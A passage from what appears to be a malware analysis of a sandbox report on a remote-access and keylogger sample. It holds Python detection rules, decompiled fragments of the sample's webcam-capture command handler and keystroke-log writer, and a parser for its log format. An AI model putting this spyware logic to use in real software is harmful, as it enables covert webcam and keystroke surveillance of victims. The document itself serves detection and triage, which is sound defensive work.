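def rule_process_watchdog(calls, strings) -> bool:
    """Block until a partner process exits, then launch a file again. The wait
    timeout is not checked on purpose: the decompiled code passes 0xffffffff
    (INFINITE) but the logged argument on this page reads 000000FF."""
    return (called(calls, "OpenProcess", lambda c: hex_arg(c, 0) == SYNCHRONIZE)
            and called(calls, "WaitForSingleObject") and called(calls, "ShellExecuteW"))

def rule_temp_drop_and_run(calls, strings) -> bool:
    """Fresh file under %TEMP% (GetTempFileNameW + CreateFileW(GENERIC_WRITE,
    CREATE_ALWAYS)) handed to ShellExecuteW."""
    writes = called(calls, "CreateFileW",
                    lambda c: hex_arg(c, 1) == GENERIC_WRITE and hex_arg(c, 4) == CREATE_ALWAYS)
    return called(calls, "GetTempFileNameW") and writes and called(calls, "ShellExecuteW")

def rule_cookie_wipe(calls, strings) -> bool:
    """Directory walk (FindFirstFileW) ending in RemoveDirectoryW, with the
    'Cookies' shell-folder name among the function's strings."""
    return (called(calls, "FindFirstFileW") and called(calls, "RemoveDirectoryW")
            and "Cookies" in strings)

RULES = {"process-watchdog": rule_process_watchdog,
         "temp-drop-and-run": rule_temp_drop_and_run,
         "ie-cookie-wipe": rule_cookie_wipe}

def triage(block_text: str) -> List[str]:
    """Names of the rules that fire on one per-function report block."""
    calls, strings = parse_block(block_text)
    return [name for name, rule in RULES.items() if rule(calls, strings)]

# Trimmed copies of the two blocks on this page (E1054C295 and the routine at 004077E7).
WATCHDOG_BLOCK = r"""
• CreateMutexA.KERNEL32(00000000,00000001,0041BA38,0041BCB0,00000000), ref: 1054C2AC
• exit.MSVCRT ref: 1054C30E
• OpenProcess.KERNEL32(00100000,00000000,80000001), ref: 1054C347
• WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 1054C353
• GetTempPathW.KERNEL32(00000104,?), ref: 1054C3F2
• GetTempFileNameW.KERNEL32(?,004168B4,00000000,?), ref: 1054C40D
  • Part of subcall function 105546E5: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,[DEBUG],00000000), ref: 10554722
• ShellExecuteW.SHELL32(00000000,0041578C,?,00000000,00000000,00000001), ref: 1054C461
• String ID: $eA$WDH
"""
COOKIE_BLOCK = r"""
  • Part of subcall function 00412BEE: FindFirstFileW.KERNEL32(?,?), ref: 00412C4B
  • Part of subcall function 00412BEE: RemoveDirectoryW.KERNEL32(?), ref: 00412CD9
• ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([IE cookies cleared!],00000000), ref: 00407867
• String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
"""

if __name__ == "__main__":
    for name, block in (("E1054C295", WATCHDOG_BLOCK), ("004077E7", COOKIE_BLOCK)):
        print(name, triage(block))
```

The watchdog rule keys on the access mask passed to OpenProcess rather than on the wait timeout: a process opened with SYNCHRONIZE alone exists only to be waited on, and the mask is logged faithfully, whereas the timeout argument printed for WaitForSingleObject (000000FF) disagrees with the 0xffffffff in the decompiled code.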

                                   C-Code - Quality: 19%
                                   			// Command handler for the webcam feature. __eax points at the incoming command
                                   			// string; the subtract chain below is the compiler's form of a switch on command
                                   			// ids 0x3c..0x40. E00406DD9 / E00407033 resolve the four exports by name, so they
                                   			// behave like LoadLibrary / GetProcAddress. E004020C2(_a4) is reached with either
                                   			// 0x1b (after a successful load) or 0x41 (when the camera cannot be opened) pushed.
                                   			E00401CCF(intOrPtr* __eax, void* __eflags, intOrPtr _a4, void* _a8) {
                                   				char _v20;
                                   				char _v36;
                                   				void* __ebp;
                                   				void* _t22;
                                   				void* _t23;
                                   				void* _t32;
                                   				char* _t33;
                                   				void* _t36;
                                   				void* _t38;
                                   				signed char _t39;
                                   				signed char _t41;
                                   				char* _t42;
                                   				int _t43;
                                   				intOrPtr _t65;
                                   				signed char _t66;
                                   				void* _t68;
                                   				intOrPtr* _t71;
                                   
                                   				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                   				_t65 =  *__eax;
                                   				__imp__?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z();
                                   				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                   				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
                                   				// split the command arguments (separator string at 0x41b310) into _v20
                                   				E004129EB(__eflags,  &_v20,  &_v36, 0x41b310,  &_v36, 4,  *__imp__?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB);
                                   				_t71 = _t68 + 0x24;
                                   				_t22 = _t65 - 0x3c;
                                   				if(_t22 == 0) {
                                   					// 0x3c: load the camera DLL named in argument 0 and resolve its exports
                                   					_t23 = E0040180C( &_v20, __eflags, 0);
                                   					__imp__?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                   					_t66 = E00406DD9(_t23);
                                   					__eflags = _t66;
                                   					if(_t66 != 0) {
                                   						 *0x41b2ec = E00407033(_t66, "OpenCamera");
                                   						 *0x41b2f0 = E00407033(_t66, "CloseCamera");
                                   						 *0x41b2f4 = E00407033(_t66, "GetFrame");
                                   						 *0x41b2f8 = E00407033(_t66, "FreeFrame");
                                   						 *0x41b2e8 = 1;                           // DLL-loaded flag
                                   						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z(0x41b290);
                                   						_push(0x1b);
                                   						goto L15;
                                   					}
                                   				} else {
                                   					_t32 = _t22 - 1;
                                   					if(_t32 == 0) {
                                   						// 0x3d: only if the camera is already open (*0x41b2e9), capture a frame (L8)
                                   						__eflags =  *0x41b2e9;
                                   						if(__eflags != 0) {
                                   							goto L8;
                                   						}
                                   					} else {
                                   						_t36 = _t32 - 1;
                                   						if(_t36 == 0) {
                                   							// 0x3e: CloseCamera and clear the camera-open flag
                                   							 *0x41b2f0();
                                   							 *0x41b2e9 =  *0x41b2e9 & 0x00000000;
                                   						} else {
                                   							_t38 = _t36 - 1;
                                   							if(_t38 == 0) {
                                   								// 0x3f: OpenCamera; failure reports 0x41 (L9), success captures a frame (L8)
                                   								_t39 =  *0x41b2ec();
                                   								__eflags = _t39;
                                   								 *0x41b2e9 = _t39;
                                   								if(__eflags == 0) {
                                   									goto L9;
                                   								} else {
                                   									L8:
                                   									// numeric argument 0 of the command is handed to E00401EA2 with the session (_a4)
                                   									_t33 = E0040180C( &_v20, __eflags, 0);
                                   									__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                   									_push(atoi(_t33));
                                   									_push(_a4);
                                   									E00401EA2(__eflags);
                                   								}
                                   							} else {
                                   								if(_t38 == 1) {
                                   									// 0x40: one-shot capture: OpenCamera, wait 1 s, grab a frame, CloseCamera
                                   									_t41 =  *0x41b2ec();
                                   									_t81 = _t41;
                                   									 *0x41b2e9 = _t41;
                                   									if(_t41 == 0) {
                                   										L9:
                                   										__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z(0x41b290);
                                   										_push(0x41);
                                   										L15:
                                   										E004020C2(_a4);
                                   									} else {
                                   										_t42 = E0040180C( &_v20, _t81, 0);
                                   										__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                   										_t43 = atoi(_t42);
                                   										 *_t71 = 0x3e8;
                                   										Sleep(??);                               // the decompiler lost the argument; it is the 0x3e8 (1000 ms) stored to the stack slot on the previous line
                                   										E00401EA2(_t81);
                                   										 *0x41b2f0(_a4, _t43);
                                   									}
                                   								}
                                   							}
                                   						}
                                   					}
                                   				}
                                   				E004017DD( &_v20);
                                   				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                   				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                   				return 0;
                                   			}

                                  APIs
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00401CD9
                                  • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,6DF55DF0), ref: 00401CF1
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B310), ref: 00401D01
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00401D10
                                    • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                    • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                    • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                    • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00401D60
                                  • atoi.MSVCRT ref: 00401D67
                                  • Sleep.KERNEL32 ref: 00401D76
                                    • Part of subcall function 00401EA2: _EH_prolog.MSVCRT ref: 00401EA7
                                    • Part of subcall function 00401EA2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000000,?), ref: 00401EDE
                                    • Part of subcall function 00401EA2: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041B310,?,0041B310,0041B290), ref: 00401F05
                                    • Part of subcall function 00401EA2: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401F1C
                                    • Part of subcall function 00401EA2: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401F29
                                    • Part of subcall function 00401EA2: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401F36
                                    • Part of subcall function 00401EA2: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401F40
                                    • Part of subcall function 00401EA2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000060), ref: 00401F55
                                    • Part of subcall function 00401EA2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401F5E
                                    • Part of subcall function 00401EA2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401F67
                                    • Part of subcall function 00401EA2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401F70
                                    • Part of subcall function 00401EA2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401F79
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00401DAD
                                  • atoi.MSVCRT ref: 00401DB4
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B290), ref: 00401DD5
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00401E0F
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B290,00000000,CloseCamera,00000000,OpenCamera), ref: 00401E73
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401E8E
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401E97
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@$V01@@$D@2@@0@Hstd@@V10@0@V?$basic_string@$?c_str@?$basic_string@?length@?$basic_string@V12@$?substr@?$basic_string@D@1@@atoi$??4?$basic_string@?data@?$basic_string@?find@?$basic_string@?size@?$basic_string@H_prologSleepV01@
                                  • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera
                                  • API String ID: 3050406488-3547787478
                                  • Opcode ID: feac5231df2058003bd33fe0bbb70bc691d3bf8f72aa97f1516ee4c4915568a4
                                  • Instruction ID: 929695bb366bec32bbf7bff6ad9df781dd06acba2e16bfd5a529381622b13abb
                                  • Opcode Fuzzy Hash: feac5231df2058003bd33fe0bbb70bc691d3bf8f72aa97f1516ee4c4915568a4
                                  • Instruction Fuzzy Hash: A7417231A00609DBCB00ABB5EC4DAED3B65EF54344F00847BE816A72E1DB789545C7DD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 33%
                                  			E00405DD3(void* __ecx, char _a4) {
                                  				struct _SYSTEMTIME _v20;
                                  				char _v36;
                                  				char _v52;
                                  				char* _t24;
                                  				char* _t25;
                                  				char* _t33;
                                  				int _t34;
                                  				void* _t46;
                                  				void* _t47;
                                  
                                  				_t47 = __ecx;
                                  				GetLocalTime( &_v20);
                                  				_t24 =  &_v52;
                                  				L00414176();
                                  				_t25 =  &_v36;
                                  				L00414170();
                                  				__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(_t25, _t25, _t24, _t24, "\r\n[%04i/%02i/%02i %02i:%02i:%02i ",  &_a4, "]\r\n");
                                  				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  				__imp__?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
                                  				_t46 = malloc(_t25 + 0x64);
                                  				_t33 = _v20.wYear & 0x0000ffff;
                                  				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t33, _v20.wMonth & 0x0000ffff, _v20.wDay & 0x0000ffff, _v20.wHour & 0x0000ffff, _v20.wMinute & 0x0000ffff, _v20.wSecond & 0x0000ffff);
                                  				_t34 = sprintf(_t46, _t33);
                                  				if( *((char*)(_t47 + 0x3c)) != 0) {
                                  					__imp__??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z(_t46);
                                  				}
                                  				if( *((char*)(_t47 + 0x3d)) != 0) {
                                  					__imp__??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z(_t46);
                                  					_t20 = _t47 + 0x34; // 0x0
                                  					_t34 = SetEvent( *_t20);
                                  				}
                                  				free(_t46);
                                  				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  				return _t34;
                                  			}

                                  Address column of the decompiled listing above: statements span 0x00405dde to 0x00405eaf

                                  APIs
                                  • GetLocalTime.KERNEL32(?,761B43E0,Offline Keylogger Started,?,?,?,?,?,?,?,?,?,?,?,004051C6), ref: 00405DE1
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,[%04i/%02i/%02i %02i:%02i:%02i ,?,],?,?,?,?,?,?,?,?,?,?,?,004051C6), ref: 00405DF9
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,]), ref: 00405E06
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,]), ref: 00405E12
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,]), ref: 00405E1B
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,]), ref: 00405E24
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,]), ref: 00405E2D
                                  • malloc.MSVCRT ref: 00405E37
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,004051C6,?,?,?,?,]), ref: 00405E61
                                  • sprintf.MSVCRT ref: 00405E69
                                  • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00405E7C
                                  • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00405E8C
                                  • SetEvent.KERNEL32(00000000), ref: 00405E95
                                  • free.MSVCRT(00000000), ref: 00405E9C
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405EA6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$??1?$basic_string@V01@$D@2@@0@Hstd@@V?$basic_string@Y?$basic_string@$??4?$basic_string@?c_str@?$basic_string@?length@?$basic_string@EventLocalTimeV01@@V10@V10@@freemallocsprintf
                                  • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                  • API String ID: 2201004561-248792730
                                  • Opcode ID: d1962dcfa14961cf68a21e729b42b9462e143896443955e606cf191a9ecd47ee
                                  • Instruction ID: 187d607a52c4f966b55e3f01ad30cf50bd50e30255d112ea0a9885b9183f1b4a
                                  • Opcode Fuzzy Hash: d1962dcfa14961cf68a21e729b42b9462e143896443955e606cf191a9ecd47ee
                                  • Instruction Fuzzy Hash: F6213676800619FFCB109B94ED49DFE7BBCFF54745B04442AF952D20A0DB789644CB68
                                  Uniqueness

                                  Uniqueness Score: -1.00%
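
The API list and format strings of E00405DD3 above pin down the on-disk shape of the sample's offline keylogger entries: GetLocalTime feeds sprintf with "\r\n[%04i/%02i/%02i %02i:%02i:%02i " followed by the caller-supplied text and "]\r\n", and the header is then appended to the log buffer before the captured keystrokes. The parser below is an added example for triaging such a log, not code from the report or from the sample. The log buffer it reads is constructed, and treating the bracketed text as a context label (the string "Offline Keylogger Started" is passed by the caller at 004051C6; what else callers pass is not shown on this page) is an assumption.

```python
"""Parser for the keystroke-log header format built by E00405DD3.

Each entry starts with
    "\r\n[%04i/%02i/%02i %02i:%02i:%02i " + <caller-supplied text> + "]\r\n"
and the keystrokes captured afterwards run until the next header.
Added example, not the sample's or the report's code. SAMPLE is a
constructed buffer; reading the bracketed text as a context label
(e.g. a window title) is an assumption.
"""
import re
from datetime import datetime
from typing import List, NamedTuple

# Header exactly as the sprintf format string on the page produces it:
# CRLF, '[', date, space, time, space, free text, ']', CRLF.
HEADER_RE = re.compile(
    r"\r\n\[(\d{4})/(\d{2})/(\d{2}) (\d{2}):(\d{2}):(\d{2}) (.*?)\]\r\n",
    re.DOTALL,
)


class Entry(NamedTuple):
    when: datetime
    label: str        # caller-supplied text between the timestamp and ']'
    keystrokes: str   # raw text captured until the next header


def parse_keylog(buf: str) -> List[Entry]:
    """Split a log buffer into entries keyed by their [timestamp label] header."""
    entries: List[Entry] = []
    matches = list(HEADER_RE.finditer(buf))
    for i, m in enumerate(matches):
        y, mo, d, h, mi, s = (int(x) for x in m.groups()[:6])
        # Body runs up to the next header, or to end of buffer for the last entry.
        body_end = matches[i + 1].start() if i + 1 < len(matches) else len(buf)
        entries.append(Entry(
            when=datetime(y, mo, d, h, mi, s),
            label=m.group(7),
            keystrokes=buf[m.end():body_end],
        ))
    return entries


def build_header(when: datetime, label: str) -> str:
    """Reproduce the header the sample writes (used here to construct test data)."""
    return "\r\n[%04i/%02i/%02i %02i:%02i:%02i %s]\r\n" % (
        when.year, when.month, when.day,
        when.hour, when.minute, when.second, label)


# Constructed sample buffer, not a real capture.
SAMPLE = (
    build_header(datetime(2022, 6, 20, 9, 15, 2), "Offline Keylogger Started")
    + build_header(datetime(2022, 6, 20, 9, 15, 30), "Untitled - Notepad")
    + "hello world[Enter]"
    + build_header(datetime(2022, 6, 20, 9, 16, 1), "Sign in")
    + "user@example.test[Tab]hunter2[Enter]"
)

if __name__ == "__main__":
    for e in parse_keylog(SAMPLE):
        print(e.when.isoformat(), repr(e.label), repr(e.keystrokes))
```

The regex anchors on the full CRLF-bracket-CRLF frame rather than on "[" alone, because the captured keystroke text itself contains bracketed key names such as "[Enter]"; a looser pattern would split entries in the middle of a line.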

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040123B
                                  • closesocket.WS2_32 ref: 00401266
                                  • ExitThread.KERNEL32 ref: 00401274
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000020,?,0041B310,00000000), ref: 0040129D
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(0041B218,00000012,?,0041B310,00000000), ref: 004012B3
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004012BE
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004012CB
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004012D8
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004012E5
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004012F1
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004012FA
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401303
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040130C
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401315
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040131E
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401327
                                  • waveInUnprepareHeader.WINMM(-0041B1DC,00000020), ref: 00401344
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00401369
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004013B3
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@D@2@@0@Hstd@@V10@0@V?$basic_string@$D@1@@$V01@@$??4?$basic_string@ExitHeaderThreadUnprepareV01@closesocketwave
                                  • String ID:
                                  • API String ID: 3470141593-0
                                  • Opcode ID: 4a7001b0b53c75aa6c0ac9d28ec628d27a27c52e3e7050642eb9c879f83a4183
                                  • Instruction ID: 5b0032f0df5236073d26c2de6242c8c0ab4ccdf0beb3001a3256587e9f107884
                                  • Opcode Fuzzy Hash: 4a7001b0b53c75aa6c0ac9d28ec628d27a27c52e3e7050642eb9c879f83a4183
                                  • Instruction Fuzzy Hash: 7741347290010DEBDB01EBE1ED5EEDE7778EB54345F108136F902A31A1DB745A48CB99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 28%
                                  			E00402637(void* __ecx, intOrPtr _a4) {
                                  				char _v5;
                                  				struct _SYSTEMTIME _v24;
                                  				char _v40;
                                  				char _v56;
                                  				char* _t42;
                                  				char* _t43;
                                  				char* _t50;
                                  				char* _t51;
                                  				void* _t68;
                                  				void* _t69;
                                  
                                  				_t68 = __ecx;
                                  				if( *((char*)(__ecx + 0x38)) == 0) {
                                  					return 0;
                                  				}
                                  				if( *0x41bcac != 0) {
                                  					if( *((char*)(__ecx + 0x44)) != 0) {
                                  						GetLocalTime( &_v24);
                                  						_t50 =  &_v5;
                                  						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z("%02i:%02i:%02i:%03i [INFO] ", _t50, "KeepAlive Enabled! Timeout: %i seconds\n", _v24.wHour & 0x0000ffff, _v24.wMinute & 0x0000ffff, _v24.wSecond & 0x0000ffff, _v24.wMilliseconds & 0x0000ffff, _a4);
                                  						_t51 =  &_v40;
                                  						L00414170();
                                  						__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t51, _t50);
                                  						printf(_t51);
                                  						_t69 = _t69 + 0x24;
                                  						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
